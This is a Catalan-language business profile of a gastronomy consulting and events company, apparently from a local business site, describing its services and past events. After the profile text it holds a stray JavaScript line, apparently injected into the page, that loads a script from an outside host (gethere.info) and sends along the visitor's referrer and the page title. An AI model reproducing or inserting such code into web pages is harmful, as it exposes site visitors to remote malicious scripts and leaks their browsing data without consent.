Pep Palau & Von Arend

Dades generals

  • Nom: PEP PALAU, VON AREND & ASSOCIATS
  • Sector / Activitat: serveis i consultoria enogastronómica
  • Núm. Treballadors: 12
  • Data creació: 2001

Ofereix diferents serveis com la creació i implantació de marques gastronòmiques, la conceptualització i producció de campanyes i actes promocionals, la producció de fires, congressos i grans esdeveniments, l’organització d’espectacles culinaris, àpats especials, premis i concursos o l’assessorament gastronòmic a institucions, empreses i col·lectius, entre d’altres. En l’àmbit de la comunicació, també ofereix servei de premsa, relacions públiques, redacció, disseny i edició de publicacions i catàlegs i confecció i manteniment de pàgines web.

Pep Palau, von Arend & Associats és una empresa de valor afegit per la ciutat, perquè desenvolupa la seva tasca professional a partir de les característiques pròpies del segle XXI (empresa propera al territori, respectuosa amb l’entorn, no contaminant, conscient de la importància de la recuperació del patrimoni cultural, industrial i arquitectònic…).

Per la pròpia activitat que realitza que ofereix, Pep Palau, von Arend & Associats contribueix a la promoció de la ciutat, ja que les seves actuacions tenen un contingut de forta repercussió als mitjans de comunicació de diferents indrets del món.

L’evolució ascendent de la empresa, la professionalitat demostrada en els seus treballs, assessories i producció de grans esdeveniments (Cuines de la Diversitat al Fòrum de les Cultures Barcelona 2004, Saló de la Xocolata de Barcelona, Fòrum Gastronòmic, etc.), fa que els seus serveis siguin sol·licitats en un àmbit geogràfic cada vegada major com ho demostra la realització de l’activitat gastronòmica que es va desenvolupar amb motiu de les Nits Sònar a la fira del llibre de Frankfurt o la celebració del Fòrum Gastronòmic a Santiago de Compostela.
En aquesta línia, el futur proper de la empresa passa per la seva projecció internacional i la consolidació de la pàgina web com a referent gastronòmic a la xarxa.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetes

Imprimir aquest article

Trackback from your site.

Deixa un comentari

Hauries d' identificar-te per deixar un comentari.
A Manlleu
Fem Xarxa